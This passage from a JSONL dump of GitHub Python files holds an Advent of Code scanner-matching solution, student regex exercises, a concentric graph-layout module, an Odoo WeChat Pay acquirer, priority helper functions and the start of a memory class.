under rotation j between beacons k and l\n all_distances = []\n\n # All 24 rotations are represnted by a 3x3 rotation matrix\n rm = get_rotation_matrices()\n\n for beacon in beacons:\n distances = create_matrix(len(beacon), len(beacon), [0, 0, 0])\n\n for i in range(len(beacon)):\n for j in range(len(beacon)):\n xdist = beacon[i][0] - beacon[j][0]\n ydist = beacon[i][1] - beacon[j][1]\n zdist = beacon[i][2] - beacon[j][2]\n\n distances[i][j] = [xdist, ydist,zdist]\n\n rotated_distances = [transform(distances, m) for m in rm]\n\n all_distances.append(rotated_distances)\n\n # When we find overlap, we record the way to convert between beacon coordiante systems\n # translations[i][j] stores the way to convert from beacon j to beacon i's coordinate system\n translations = create_matrix(len(beacons), len(beacons), None)\n\n # The number of matches required to consider the beacons sufficiently overlapped\n MATCH = 12\n\n # Iterate over every pair of scanners to identify overlaps between them\n for i in range(len(beacons)):\n first = all_distances[i][0]\n\n for j in range(i + 1, len(beacons)):\n second_all = all_distances[j]\n\n found = False\n\n # Iterate over all rotations of the second beacon's coordinate system\n for k, second in enumerate(second_all):\n m = rm[k]\n\n # Iterate over all 
rows in the two distance matrices\n # Skip the final 11 (or MATCH-1) rows because 12 rows should match\n for fr in first[:-(MATCH-1)]:\n for sr in second[:-(MATCH-1)]:\n matches = count_matches(fr, sr)\n\n if matches == 12:\n # Determine the indices of two matching beacons\n a_idx, b_idx = extract_match(fr, sr)\n\n # Get coordinates of matching beacon relative to the first scanner\n first_beacon_A = beacons[i][a_idx]\n\n # Get coordinates of matching beacon, but transformed so that\n # both coordinate systems are in the same rotational frame\n first_beacon_B = np.matmul(m, beacons[j][b_idx])\n\n # Determine the position of the second scanner relative to the first\n posB = diff(first_beacon_A, first_beacon_B)\n\n # Determine the rotation matrix to go from A -> B instead of B -> A\n # This should just be the transpose since it's orthogonal\n inv_m = np.linalg.inv(m)\n\n # Determine the position of the first scanner relative to the second\n inv_pos = np.matmul(inv_m, negate(posB))\n\n # Store the translations in the translation matrix\n translationA = Translation(m, posB)\n translationB = Translation(inv_m, inv_pos)\n\n translations[i][j] = translationA\n translations[j][i] = translationB\n\n print(f'Found match between {i} and {j} for rotation {k}')\n\n found = True\n break\n\n if found:\n break\n\n if found:\n break\n\n\n # We have a partial table of translations between scanners\n # We fill out the entire table so we have translations for all scanners relative to scanner 0\n changed = True\n while changed: # It is necessary to run this a couple times to fill everything in\n changed = False\n\n # Iterate over every cell in the translation matrix\n for i in range(len(translations)):\n for j in range(len(translations)):\n\n # If we find an existing translation, we leverage it to create other translations\n if i != j and translations[i][j] is not None:\n\n # Iterate over every column in row j to find translations we can leverage\n for k in range(len(translations)):\n\n # If we found a translation that will let us fill in a part of the table\n # We compute the translation\n if i != k and translations[j][k] is not None and translations[i][k] is None:\n # Leverage linear algebra to chain the rotation matrices\n mat = np.matmul(translations[i][j].matrix, translations[j][k].matrix)\n\n pos = add(np.matmul(translations[i][j].matrix, translations[j][k].pos), translations[i][j].pos)\n\n translations[i][k] = Translation(mat, pos)\n changed = True\n print(f'Computed translation between {i} and {k}')\n\n # We throw all the final coordinates in a set to eliminate duplicates\n final = set()\n\n # Iterate over all the scanners to add their beacons relative to scanner 0\n for i, group in enumerate(beacons):\n # No translations needed for scanner 0\n if i == 0:\n for beacon in group:\n final.add(tuple(beacon))\n\n # Otherwise use the translation to place beacon locations relative to scanner 0 in set\n else:\n for beacon in group:\n trans = np.matmul(translations[0][i].matrix, beacon)\n trans = add(trans, translations[0][i].pos)\n\n final.add(tuple(trans))\n\n print(f'Total beacons: {len(final)}')\n\n # Also do part 2 since my solution is kinda slow\n # Just iterate over all the pairs of scanners to get the distances\n d = 0\n for i in range(len(beacons)):\n for j in range(i + 1, len(beacons)):\n # Scanner 0 sits at the origin of the shared frame, so handle it explicitly\n pos_i = [0, 0, 0] if i == 0 else translations[0][i].pos\n dist_vec = diff(pos_i, translations[0][j].pos)\n newd = int(sum([abs(elem) for elem in dist_vec]))\n\n d = max(d, newd)\n\n print(f'Maximum L-1 distance between scanners: {d}')\n\n return 
len(final), d\n\ndef p2(raw, lines, sections, nums, *args, **kwargs):\n ans = 0\n\n\n return ans\n\nrun_solutions(p1, p2)\n","repo_name":"sColin16/AoC","sub_path":"2021/19.py","file_name":"19.py","file_ext":"py","file_size_in_byte":8459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"3914671211","text":"import re\r\r\n'''s=input()\r\r\np=' /?.!@#$%^&*() '\r\r\nif re.search(p,s):\r\r\n print(' not found ')\r\r\nelse:\r\r\n print(' found')\r\r\n\r\r\n#2\r\r\ns=input()\r\r\np=r'\\w+[ab]+\\w'\r\r\nif re.search(p,s):\r\r\n print(' match found ')\r\r\nelse:\r\r\n print(' not found')\r\r\n\r\r\n#3\r\r\n\r\r\ns=input()\r\r\np='exercise'\r\r\nc=0\r\r\nx=re.findall(p,s)\r\r\nfor i in x:\r\r\n c=c+1\r\r\nprint(c)\r\r\nl='rishi'\r\r\nprint(re.sub(p,l,s))\r\r\n\r\r\n#4\r\r\ns=['bush','fox','toy','cap','candy']\r\r\nl=[]\r\r\nfor i in s:\r\r\n if i.endswith('h',0,len(i)):\r\r\n i=i+'es'\r\r\n l.append(i)\r\r\n elif i.endswith('x',0,len(i)):\r\r\n i=i+'es'\r\r\n l.append(i)\r\r\n else:\r\r\n i=i+'s'\r\r\n l.append(i)\r\r\nprint(l)\r\r\n'''\r\r\n#5\r\r\nrk=[]\r\r\ns=['bush','fox','toy','cap','candy']\r\r\np1='[^aeiou][hxp]$'\r\r\np2='[^aeiou]y$'\r\r\nfor i in s:\r\r\n if re.search(p1,i):\r\r\n rk.append(i+'es')\r\r\n elif re.search(p2,i):\r\r\n rk.append(i[:len(i)-1]+'ies')\r\r\n else :\r\r\n rk.append(i+'s')\r\r\nprint(rk)\r\r\n'''\r\r\n#6\r\r\ns=input()\r\r\nl=[]\r\r\np1='cats'\r\r\np2='dogs'\r\r\nc=0\r\r\nx=re.findall(p1,s)\r\r\ny=re.findall(p2,s)\r\r\nfor i in x:\r\r\n c=c+1\r\r\nprint('cats',c)\r\r\nc=0\r\r\nfor i in y:\r\r\n c=c+1\r\r\nprint('dogs',c)\r\r\np3='[0-9]+'\r\r\nprint(re.findall(p3,s))\r\r\n'''\r\r\n#7\r\r\ns=input()\r\r\np1=r'[a-z]'\r\r\np2=r'[A-Z]'\r\r\np3=r'[ 0-9 ]'\r\r\np4=r'[@!#$&] '\r\r\nl=len(s)\r\r\nif (re.search(p1,s)) and (re.search(p2,s)) and (re.search(p3,s)) and (re.search(p4,s)) and (l>6) and (l<=12):\r\r\n print('valid')\r\r\nelse:\r\r\n print('not valid')\r\r\n","repo_name":"samikshasadana/python_codes","sub_path":"24sept.py","file_name":"24sept.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"10278904728","text":"import numpy as np\nimport networkx as nx\nfrom numpy.lib.stride_tricks import sliding_window_view\nimport math\nimport pandas as pd\n\n\ndef get_ring_coord(n, R, offset=False):\n '''\n Place {n} nodes evenly along a circle of radius {R}.\n Arguments:\n - n (int): number of nodes\n - R (float): radius\n - offset (bool): shift angle by half a unit\n Returns:\n - x, y: two vectors -- one for the x position and one for the y\n '''\n theta = np.linspace(0, 2*np.pi - (2*np.pi/n), n)\n if offset:\n theta = theta + (np.pi/n)\n\n x = R * (np.sin(theta))\n y = R * (np.cos(theta))\n\n return x, y\n\n\n# Function to calculate the ring's radius given padding, number of nodes, and radius of each node\nbig_r = lambda n, r, p=0: n * (2*r + p) / (2*np.pi)\n\ndef even_number_method(n, r, layers=1):\n '''\n Get radius values for each layer given {n} nodes with {r} radius each.\n This method ensures the same number of nodes are in each layer.\n \n Returns:\n - R_arr: array of length {layers} for each radius\n - n_arr: array of length {layers} for number of nodes per layer\n '''\n n_arr = np.array([len(x) for x in np.array_split(np.zeros(n), layers)])\n n_arr = np.flip(n_arr) # Flip so the more remainders are outside\n \n # Initialize first radius where padding is 0\n # Add 2r/(n-1) to handle cases where {n} is 
small\n R_arr = np.repeat(big_r(n_arr[0], r) + 2*r/(n-1), layers)\n # The next radii go outwards linearly\n R_arr = np.array([x + i*(2*r) for i, x in enumerate(R_arr)])\n \n return R_arr, n_arr\n\n\ndef even_spacing_method(n_tot, n_fl_co, r):\n '''\n Get radius values for each layer given {n_tot} nodes with {r} radius each. \n The first layer is guaranteed to have at most {n_fl_co} nodes (number of first-layer cutoff).\n This method ensures each layer is tightly packed on its diameter, except the outermost one.\n \n This has the potential to be expanded on where n_fl_co is calculated with the outermost layer's\n spacing in mind. If that layer's spacing is too sparse, then n_fl_co can be iterated up or down.\n \n Returns:\n - R_arr: array of length {layers} for each radius\n - n_arr: array of length {layers} for number of nodes per layer\n '''\n n_fl = min(n_tot, n_fl_co)\n\n R_arr = [max(big_r(n_fl, r), 4*r)]\n\n n_arr = [n_fl]\n n_fitted = n_fl\n while n_fitted < n_tot:\n R_i = R_arr[-1] + 2*r\n\n outer_diam = R_i * 2 * np.pi\n i_fitted = outer_diam // (2*r)\n\n n_fitted += i_fitted\n n_arr.append(i_fitted)\n R_arr.append(R_i)\n\n # Last one needs special treatment\n n_arr[-1] = n_arr[-1] - (np.sum(n_arr) - n_tot)\n n_arr = [int(x) for x in n_arr]\n\n return R_arr, n_arr\n\n\ndef node_coords(R_arr, n_arr):\n '''\n Assign coordinate values for an array of {R_arr} ring radii -- each ring containing {n_arr[i]} nodes.\n Returns:\n - Xs, Ys: arrays of X and Y values each with length {n}\n '''\n\n Xs = []\n Ys = []\n offset = False\n for r, ns in zip(R_arr, n_arr):\n X, Y = get_ring_coord(ns, r, offset=offset)\n Xs.append(X)\n Ys.append(Y)\n offset = not offset\n\n Xs = np.concatenate(Xs)\n Ys = np.concatenate(Ys)\n \n return Xs, Ys\n\n\ndef get_xy(n, n_fl_co=20, r=1050, offset_x=0, offset_y=0):\n n_tot = int(n)\n n_fl_co = int(n_fl_co)\n r = float(r)\n\n assert n >= 0, f\"{n}: Total number of nodes must be an integer > 0\"\n assert n_fl_co > 0, f\"{n_fl_co}: At least 1 node in the first layer is required\"\n assert r > 0, f\"{r}: r must be a float > 0\"\n \n if n == 0:\n return None, None, None, None\n\n R_arr, n_arr = even_spacing_method(n_tot, n_fl_co, r)\n Xs, Ys = node_coords(R_arr, n_arr)\n \n Xs = Xs + offset_x\n Ys = Ys + offset_y\n\n return Xs, Ys, R_arr, n_arr\n\ndef SQ_layered_concentric(qnodes_df, qedges_df):\n # Sort the nodes by thickness to be arranged polarly\n query_id = qnodes_df[qnodes_df[\"depth\"] == 0].iloc[0][\"Id\"]\n\n nq1 = qedges_df[qedges_df.source == query_id][[\"target\", \"thickness\"]].rename(columns={\"target\": \"Id\"})\n nq2 = qedges_df[qedges_df.target == query_id][[\"source\", \"thickness\"]].rename(columns={\"source\": \"Id\"})\n\n nq_df = pd.concat([nq1, nq2])\n nq_df = nq_df.groupby(\"Id\").max().reset_index()\n qnodes_df = qnodes_df.merge(nq_df, on=\"Id\", how=\"left\")\n qnodes_df = qnodes_df.sort_values([\"depth\", \"thickness\"], ascending=[True, False])\n\n # Calculate x, y coordinates for each node\n Xs, Ys, _, __ = get_xy(len(qnodes_df)-1, n_fl_co=20, r=1050)\n Xs = [0] + list(Xs) # First index is 0 because it's the query node\n Ys = [0] + list(Ys)\n \n qnodes_df[\"lc_X\"] = Xs; qnodes_df[\"lc_Y\"] = Ys\n \n return qnodes_df\n \n\ndef layered_concentric(qnodes_df):\n qnodes_df = qnodes_df.sort_values(\"Type\", ascending=False)\n vc_nodes = qnodes_df.Type.value_counts()\n\n n_query = vc_nodes[\"Query\"]\n n_links = vc_nodes.sum() - vc_nodes[\"Query\"]\n\n # Compute X and Y for concentric layout\n Xs = []; Ys = []\n\n r1 = 250\n Xs_q, Ys_q, R_arr_q, 
n_arr_q = get_xy(n_query, r=r1)\n Xs.extend(Xs_q); Ys.extend(Ys_q)\n\n if n_links>0:\n r2 = 100\n n_fl_co_d = 2 * np.pi * (R_arr_q[-1] + 3*r1) / (2 * r2)\n Xs_d, Ys_d, R_arr_d, n_arr_d = get_xy(n_links, n_fl_co_d, r=r2)\n Xs.extend(Xs_d); Ys.extend(Ys_d)\n \n qnodes_df[\"lc_X\"] = Xs; qnodes_df[\"lc_Y\"] = Ys\n \n return qnodes_df\n\n\ndef assign_cluster(qedges_df, qnodes_df):\n ''' Assign each node to a query \"cluster\"\n Argument:\n qedges_df (pd.DataFrame): edge dataframe for query\n qnodes_df (pd.DataFrame): node dataframe for query\n Returns:\n qnodes_df (pd.DataFrame): updated nodes dataframe with extra \"clust\" column\n clust_sizes(pd.Series): size of each query cluster\n '''\n qnodes_df = qnodes_df.reset_index(drop=True)\n qedges_df = qedges_df.reset_index(drop=True)\n \n # Prepare the cluster column. Note: query nodes will have their own Id as their cluster.\n qnodes_df[\"clust\"] = qnodes_df[\"Id\"]\n\n qG = nx.from_pandas_edgelist(qedges_df, edge_attr=True, source=\"source\", target=\"target\", create_using=nx.Graph())\n adj_mat = nx.adjacency_matrix(qG, nodelist=qnodes_df[\"Id\"], weight=\"thickness\")\n\n # Get query and non-query nodes, construct query-non-query adjacency matrix\n queries = qnodes_df[qnodes_df[\"Type\"] == \"Query\"][\"Id\"]\n q_i = np.array(queries.index)\n nq_i = np.setdiff1d(range(len(qnodes_df)), q_i)\n adj_mat = adj_mat[np.ix_(nq_i, q_i)]\n\n # Divide columns by column sums to normalize over each query node's baseline \"popularity\"\n colsum = np.sum(adj_mat, axis=0)\n adj_mat = np.nan_to_num(adj_mat/colsum, 0)\n\n # Assign each non-query node to a query node\n assign = np.asarray(np.argmax(adj_mat, axis=1).squeeze()).squeeze()\n assign = queries.reset_index(drop=True)[assign] # Now want to index specific to the list of queries\n assign.index = nq_i\n qnodes_df.loc[nq_i,\"clust\"] = assign\n \n clust_sizes = qnodes_df.groupby(\"clust\").size().sort_values(ascending=False)\n \n # Sort nodes table to be in the order of assigning X and Y coordinates\n qnodes_df.clust = qnodes_df.clust.astype(\"category\")\n qnodes_df.clust = qnodes_df.clust.cat.set_categories(clust_sizes.index)\n qnodes_df = qnodes_df.sort_values([\"clust\", \"Type\"], ascending=[True, False]).reset_index(drop=True)\n \n return qnodes_df, clust_sizes\n\n\ndef cluster_xy(ring_R, Rs, offset=False, arr_family=False, denom=4):\n ''' Compute the center location of clusters given the radius of the current layer and variable cluster radii\n Arguments:\n ring_R (float): radius of the layer that the cluster should reside along\n Rs (arr): array of cluster radii\n offset (bool): stagger X and Y values to help visualization\n arr_family (bool): arrange clusters by family (avoids monotonic decreasing cluster size)\n denom (int): consider 1/{denom} of the total clusters as big (only applicable if gini coefficient not above threshold)\n Returns:\n cX, cY (arr): coordinates for each cluster at current layer\n '''\n # Calculate the circumference\n circ = ring_R*2*np.pi\n \n # Calculate number of nodes counted as big in family assignment\n gc = gini_coefficient(Rs)\n if gc > 0.3:\n n_big = np.sum(Rs > np.mean(Rs))\n else:\n n_big = math.floor(max(denom, len(Rs))/denom) #minimum of 1 big node\n \n #Get index for family-sorted Rs\n if arr_family:\n family = assign_family(Rs, n_big=n_big)\n family_idx = np.argsort(family)\n else: \n family_idx = np.arange(len(Rs))\n\n # Sort Rs by family\n Rs = Rs[family_idx]\n \n # The cumulative sum of sliding window sum (of radii) corresponds to the center locations along 
a linearized ring\n # Handle if there is only 1 R in Rs\n if len(Rs) == 1:\n Rs = np.insert(Rs, -1, 0)\n lin_centers = np.insert(np.cumsum(np.sum(sliding_window_view(Rs, window_shape = 2), axis = 1)), 0, 0)\n \n # Compute the remainder space within the layer and evenly distribute it as padding between clusters\n remainder = circ - (lin_centers[-1]+Rs[-1]+Rs[0])\n assert remainder >= 0, f\"Layer overcrowded: remainder of {remainder}\" # Check if remainder is negative\n remainder_pad = remainder / (len(Rs))\n \n # Push the centers by the remainder padding. Automatically accounts for inter-cluster padding.\n lin_centers = [lin_centers[i] + remainder_pad*i for i in range(len(lin_centers))]\n lin_centers = np.array(lin_centers) / circ\n lin_centers = lin_centers*2*np.pi\n \n # Restore original order\n lin_centers = lin_centers[np.argsort(-Rs)]\n \n # Stagger adjacent layers for readability (this is not the optimal way to do it)\n if not offset:\n cX = ring_R * np.cos(lin_centers)\n cY = ring_R * np.sin(lin_centers)\n else:\n cX = ring_R * np.cos(lin_centers+(np.pi/2))\n cY = -ring_R * np.sin(lin_centers+(np.pi/2))\n \n return cX, cY\n\n\ndef cluster_layer(clust_sizes, icp=10000, n_fl_co=20, r=1050, arr_family=False, denom=4):\n ''' Compute the coordinates for each cluster\n Arguments:\n clust_sizes (arr): how many nodes in each cluster\n icp (float): inter-cluster padding. How much each cluster should be spaced out\n **kwargs: for even_spacing_method (so, radius and number of first-layer cutoff)\n \n Returns:\n cXs, cYs (arr): coordinates for each cluster\n '''\n assert (np.array(clust_sizes) == -np.sort(-clust_sizes)).all(), \"Sort by descending first\"\n \n # First retrieve each cluster's radius\n R_maxes = []\n for n in clust_sizes:\n R_arr, n_arr = even_spacing_method(n, n_fl_co=n_fl_co, r=r)\n R_maxes.append(max(R_arr))\n R_maxes = np.array(R_maxes)\n\n # Initialize cluster membership and radii\n layer_assign = np.zeros(len(R_maxes))\n layer_assign[0] = 1\n R_arr = [0, R_maxes[0]+icp+R_maxes[1]]\n\n # Cumulative sum is used to track how many variable-radius nodes can fit in each layer\n layer = 2\n csum = np.cumsum((2*R_maxes) + icp)\n csum = csum - csum[0]\n \n cXs = [0]\n cYs = [0]\n\n offset = False # Used to improve visibility of adjacent layers\n # While at least one cluster has not been assigned yet...\n while np.product(layer_assign) == 0:\n curr_circ = 2*np.pi*R_arr[-1]\n\n # Greater than 0 because csum will be subtracted by the csum immediately exceeding current layer's capacity\n i_fit = (csum <= curr_circ) & (csum > 0)\n # Assign layer to the clusters that fit\n layer_assign[i_fit] = layer\n \n # Record the maximum radius fitting in the current layer to update the next layer's radius\n R_max_layer = max(R_maxes[np.where(i_fit)])\n \n # Get adjustment coordinate of cluster\n cX, cY = cluster_xy(R_arr[-1], R_maxes[i_fit], offset=offset, arr_family=arr_family, denom=denom)\n offset = not offset\n cXs.extend(cX); cYs.extend(cY)\n \n R_arr.append(R_arr[-1]+icp+R_max_layer)\n \n # Dummy way of avoiding error when loop probably met exit condition\n try:\n i_fit_max = max(np.squeeze(np.where(i_fit)))\n csum = csum - csum[i_fit_max] # Update csum to account for fitting the previous layer\n except:\n break\n \n layer += 1\n \n return cXs, cYs\n\ndef gini_coefficient(x):\n \"\"\"Compute Gini coefficient of array of values\"\"\"\n diffsum = 0\n for i, xi in enumerate(x[:-1], 1):\n diffsum += np.sum(np.abs(xi - x[i:]))\n return diffsum / (len(x)**2 * np.mean(x))\n\ndef 
assign_family(clust_sizes, n_big=3):\n ''' Assigns each cluster to a family\n Arguments:\n clust_sizes (arr): how many nodes in each cluster, sorted from largest to smallest\n n_big (int): top n nodes to consider as \"big\"\n \n Returns:\n family (arr): int representing the family each cluster belongs to\n '''\n n_big = min(n_big, len(clust_sizes))\n n_tile = math.ceil(len(clust_sizes)/n_big)\n family = np.tile(np.arange(n_big), n_tile)[:len(clust_sizes)]\n return family\n\ndef cluster_layered_concentric(qnodes_df, qedges_df, r=100, icp=500, arr_family=False, denom=4):\n qnodes_df, clust_sizes = assign_cluster(qedges_df, qnodes_df)\n cXs, cYs = cluster_layer(clust_sizes-1, r=r, icp=icp, arr_family=arr_family, denom=denom)\n\n full_Xs = []; full_Ys = []\n for i in range(len(clust_sizes)):\n # First node is query node and center of cluster\n Xs, Ys, _, _ = get_xy(clust_sizes[i]-1, offset_x=cXs[i], offset_y=cYs[i], r=r)\n\n full_Xs.append(cXs[i]); full_Ys.append(cYs[i])\n if Xs is not None:\n full_Xs.extend(Xs); full_Ys.extend(Ys)\n \n qnodes_df[\"clc_X\"] = full_Xs; qnodes_df[\"clc_Y\"] = full_Ys\n \n return qnodes_df","repo_name":"micw42/verit-web","sub_path":"Visualization/layeredConcentric.py","file_name":"layeredConcentric.py","file_ext":"py","file_size_in_byte":13903,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"19699238902","text":"# -*- coding: utf-'8' \"-*-\"\nfrom openerp.addons.payment_weixin.controllers.main import WeixinController\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json\nimport logging\nimport urlparse\nimport urllib2\nfrom lxml import etree\nimport random\nimport string\n\nimport util\nfrom openerp.addons.payment.models.payment_acquirer import ValidationError\nfrom openerp.http import request\nfrom openerp import api, fields, models\n\n_logger = logging.getLogger(__name__)\n\n\nclass AcquirerWeixin(models.Model):\n _inherit = 'payment.acquirer'\n\n def _get_ipaddress(self):\n return self.ip_address\n\n @api.model\n def _get_providers(self):\n providers = super(AcquirerWeixin, self)._get_providers()\n providers.append(['weixin', 'weixin'])\n return providers\n\n weixin_appid = fields.Char(string='Weixin APPID', required_if_provider='weixin')\n weixin_mch_id = fields.Char(string=u'微信支付商户号', required_if_provider='weixin')\n weixin_key = fields.Char(string=u'API密钥', required_if_provider='weixin')\n weixin_secret = fields.Char(string='Weixin Appsecret', required_if_provider='weixin')\n ip_address = fields.Char(string='IP Address', required_if_provider='weixin')\n\n def _get_weixin_urls(self, environment):\n if environment == 'prod':\n return {\n 'weixin_url': 'https://api.mch.weixin.qq.com/pay/unifiedorder'\n }\n else:\n return {\n 'weixin_url': 'https://api.mch.weixin.qq.com/pay/unifiedorder'\n }\n\n @api.one\n def _get_weixin_key(self):\n return self.weixin_key\n\n _defaults = {\n 'fees_active': False,\n }\n\n def json2xml(self, json):\n string = \"\"\n for k, v in json.items():\n string = string + \"<%s>\" % (k) + str(v) + \"</%s>\" % (k)\n\n return string\n\n def _try_url(self, request, tries=3, context=None):\n\n done, res = False, None\n while (not done and tries):\n try:\n res = urllib2.urlopen(request)\n done = True\n except urllib2.HTTPError as e:\n res = e.read()\n e.close()\n if tries and res and json.loads(res)['name'] == 'INTERNAL_SERVICE_ERROR':\n _logger.warning('Failed contacting Weixin, retrying (%s remaining)' % tries)\n tries = tries - 1\n if not res:\n pass\n # raise 
openerp.exceptions.\n result = res.read()\n res.close()\n return result\n\n def random_generator(self, size=6, chars=string.ascii_uppercase + string.digits):\n return ''.join([random.choice(chars) for n in xrange(size)])\n\n @api.multi\n def weixin_form_generate_values(self, partner_values, tx_values):\n self.ensure_one()\n base_url = self.env['ir.config_parameter'].get_param('web.base.url')\n amount = int(tx_values.get('amount', 0) * 100)\n nonce_str = self.random_generator()\n\n weixin_tx_values = dict(tx_values)\n weixin_tx_values.update(\n {\n 'appid': self.weixin_appid,\n 'mch_id': self.weixin_mch_id,\n 'nonce_str': nonce_str,\n 'body': tx_values['reference'],\n 'out_trade_no': tx_values['reference'],\n 'total_fee': amount,\n 'spbill_create_ip': self._get_ipaddress(),\n 'notify_url': '%s' % urlparse.urljoin(base_url, WeixinController._notify_url),\n 'trade_type': 'NATIVE',\n 'product_id': tx_values['reference'],\n }\n )\n\n data_post = {}\n data_post.update(\n {\n 'appid': self.weixin_appid,\n 'mch_id': self.weixin_mch_id,\n 'nonce_str': nonce_str,\n 'body': tx_values['reference'],\n 'out_trade_no': tx_values['reference'],\n 'total_fee': amount,\n 'spbill_create_ip': self._get_ipaddress(),\n 'notify_url': '%s' % urlparse.urljoin(base_url, WeixinController._notify_url),\n 'trade_type': 'NATIVE',\n 'product_id': tx_values['reference'],\n }\n )\n\n _, prestr = util.params_filter(data_post)\n weixin_tx_values['sign'] = util.build_mysign(prestr, self.weixin_key, 'MD5')\n data_post['sign'] = weixin_tx_values['sign']\n\n data_xml = \"<xml>\" + self.json2xml(data_post) + \"</xml>\"\n\n url = self._get_weixin_urls(self.environment)['weixin_url']\n\n request = urllib2.Request(url, data_xml)\n result = self._try_url(request, tries=3)\n\n _logger.info(\"request to %s and the request data is %s, and request result is %s\" % (url, data_xml, result))\n return_xml = etree.fromstring(result)\n\n if return_xml.find('return_code').text == \"SUCCESS\" and return_xml.find('code_url') is not None:\n qrcode = return_xml.find('code_url').text\n weixin_tx_values['qrcode'] = qrcode\n else:\n return_code = return_xml.find('return_code').text\n return_msg = return_xml.find('return_msg').text\n raise ValidationError(\"%s, %s\" % (return_code, return_msg))\n\n return partner_values, weixin_tx_values\n\n @api.multi\n def weixin_get_form_action_url(self):\n self.ensure_one()\n return self._get_weixin_urls(self.environment)['weixin_url']\n\n\nclass TxWeixin(models.Model):\n _inherit = 'payment.transaction'\n\n weixin_txn_id = fields.Char(string='Transaction ID')\n weixin_txn_type = fields.Char(string='Transaction type')\n\n\n # --------------------------------------------------\n # FORM RELATED METHODS\n # --------------------------------------------------\n\n def _weixin_form_get_tx_from_data(self, data):\n reference, txn_id = data.get('out_trade_no'), data.get('out_trade_no')\n if not reference or not txn_id:\n error_msg = 'weixin: received data with missing reference (%s) or txn_id (%s)' % (reference, txn_id)\n _logger.error(error_msg)\n raise ValidationError(error_msg)\n\n # find tx -> @TDENOTE use txn_id ?\n tx_ids = self.search([('reference', '=', reference)])\n if not tx_ids or len(tx_ids) > 1:\n error_msg = 'weixin: received data for reference %s' % (reference)\n if not tx_ids:\n error_msg += '; no order found'\n else:\n error_msg += '; multiple order found'\n _logger.error(error_msg)\n raise ValidationError(error_msg)\n return tx_ids[0]\n\n def _weixin_form_validate(self, tx, data):\n status = 
data.get('trade_state')\n # use a separate dict so the incoming 'data' is not shadowed when 'time_end' is read below\n res = {\n 'acquirer_reference': data.get('out_trade_no'),\n 'weixin_txn_id': data.get('out_trade_no'),\n 'weixin_txn_type': data.get('fee_type'),\n\n }\n\n if status == 0:\n _logger.info('Validated weixin payment for tx %s: set as done' % (tx.reference))\n res.update(state='done', date_validate=data.get('time_end', fields.datetime.now()))\n return tx.write(res)\n\n else:\n error = 'Received unrecognized status for weixin payment %s: %s, set as error' % (tx.reference, status)\n _logger.info(error)\n res.update(state='error', state_message=error)\n return tx.write(res)\n","repo_name":"vnsofthe/odoo-dev","sub_path":"addons/payment_weixin/models/weixin.py","file_name":"weixin.py","file_ext":"py","file_size_in_byte":7397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"23860300378","text":"from tx2.UserReg.models import Priority\nfrom tx2.UserReg.DBFunctions.DBFunctions import DBUpdatePriority, DBInsertPriority\nfrom tx2.Users.models import Group, User\nclass PriorityFnx():\n def updatePriority(self, ContentType, Record,UserGroup, PriorityVal, Desc,by,ip ):\n try:\n if(PriorityVal=='Default'):\n PriorityVal=1\n \n details={\n 'ContentType':ContentType, \n 'Record': Record,\n 'Group': UserGroup,\n 'Priority':PriorityVal,\n 'Desc':Desc,\n 'RequestedOperation':'SYSTEM_PERMISSION_UPDATE',\n 'ByUser':by,\n 'ip':ip,\n 'LogsDesc':\"Update\"\n }\n res= DBUpdatePriority(details)\n return res\n except:\n error_message= \"Error @ updatePriority in Business Function\"\n self.CommunicationLogger.exception('[%s] == Exception =='%('updatePriority'))\n return (-5, error_message)\n def setPriority(self, ContentType, Record,UserGroup, PriorityVal, Desc,by,ip ):\n try:\n if(PriorityVal=='Default'):\n PriorityVal=1\n \n details={\n 'ContentType':ContentType, \n 'Record': Record,\n 'Group': UserGroup,\n 'Priority':PriorityVal,\n 'Desc':Desc,\n 'RequestedOperation':'SYSTEM_PERMISSION_INSERT',\n 'ByUser':by,\n 'ip':ip\n }\n res= DBInsertPriority(details)\n return res\n except:\n error_message= \"Error @ setPriority in Business Function\"\n self.CommunicationLogger.exception('[%s] == Exception =='%('setPriority'))\n return (-5, error_message)\n \n def getPriorityByUserID(self, user_id, _ContentType,_Record):\n try:\n group=User.objects.filter(id=user_id).first() # .get() would raise DoesNotExist instead of returning None\n if(group is None):\n return (-1, 'User does not exist')\n else:\n GroupId=group.Group_id\n priority= Priority.objects.filter(ContentType=_ContentType, Record= _Record, UserGroup=GroupId).first() # filter() never returns None, so take the first match\n if(priority is None):\n return (-1,'Priority Record does not exist for this User-Group and record')\n else:\n return priority.PriorityVal \n except:\n error_message= \"Error @ getPriorityByUserID in Business Function\"\n self.CommunicationLogger.exception('[%s] == Exception =='%('getPriorityByUserID'))\n return (-5, error_message)\n ","repo_name":"upcomingnewton/tx2","sub_path":"tx2/UserReg/BusinessFunctions/PriorityFnx.py","file_name":"PriorityFnx.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"21076150376","text":"import pdb\n\nclass Memory():\n FLASH, EEPROM, SRAM, REG = range(4)\n def __init__(self, size, memtype, base = 0):\n self.size = size\n self.memtype = memtype\n self.base = base\n self.highest_used = None\n \n self.mem = bytearray(self.size)\n self.bitmap = bytearray(self.size // 8)\n \n\n def empty(self, addr):\n \"\"\" Return True/False depending on whether 'addr' is initialized\n 
